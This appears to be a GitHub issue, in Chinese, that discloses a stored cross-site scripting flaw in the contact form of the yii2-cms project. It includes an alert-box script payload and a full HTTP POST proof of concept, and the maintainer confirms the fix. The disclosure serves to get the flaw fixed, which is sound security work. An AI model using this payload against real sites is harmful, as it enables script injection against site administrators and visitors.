yii2-cms存在存储型XSS #2

SwagXz · 2019-08-31T14:28:50Z

在前端的留言处未全部过滤输入内容或者限制输入长度

有效负荷：
<script>alert(1)</script>
文件名 protected\core\modules\home\models\Contact.php
代码

public function rules()
    {
        return [
            [['name', 'company', 'mobile', 'email'], 'required'],
            [['demand'], 'string'],
            [['created_at', 'status'], 'integer'],
            [['name', 'company'], 'string', 'max' => 90],
            [['mobile'], 'string', 'max' => 16],
            ['mobile','match','pattern'=>'/^[1][34578][0-9]{9}$/'],
            [['email'], 'string', 'max' => 64],
            [['email'], 'email'],
        ];
    }

利用
我们发现name没有限制输入的长度，尝试构造有效负荷
POC

POST /contact.html HTTP/1.1
Host: locahost
Content-Length: 306
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/contact.html
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1567164052; language=213818186103fa19c30d2710ecd18c48946ee2fed0bdcf0e471bab24ce058358a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A5%3A%22zh_cn%22%3B%7D; PHPSESSID=38ddvm4dugu5jdq4pt0h02qr5s; _csrf=5e85092cfa3136d9cc8ee4322826276d759fd8c851c83ede47293177c4fe9153a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22O12VBFrR_KCflwAXh8qvr4LMjscRlbem%22%3B%7D
Connection: close

_csrf=Aaq-w1PPi7_1C1seTIMQh0aI7VOoXKOf96plwSzQ9fpOm4yVEYn57apAGHgg9FHfLrCcJdpo79Kd2QaTQLKQlw%3D%3D&Contact%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Contact%5Bemail%5D=133333%40qq.com&Contact%5Bmobile%5D=13333333333&Contact%5Bcompany%5D=1&Contact%5Bdemand%5D=1

结果
我们去后台查看

The text was updated successfully, but these errors were encountered:

xiaomalover · 2019-09-09T02:47:22Z

感谢反馈，

已修改，是因为title引用了name，输出时忘记处理了，现已修改

xiaomalover closed this as completed Sep 9, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

yii2-cms存在存储型XSS #2

yii2-cms存在存储型XSS #2

SwagXz commented Aug 31, 2019 •

edited

Loading

xiaomalover commented Sep 9, 2019 •

edited

Loading

yii2-cms存在存储型XSS #2

yii2-cms存在存储型XSS #2

Comments

SwagXz commented Aug 31, 2019 • edited Loading

xiaomalover commented Sep 9, 2019 • edited Loading

SwagXz commented Aug 31, 2019 •

edited

Loading

xiaomalover commented Sep 9, 2019 •

edited

Loading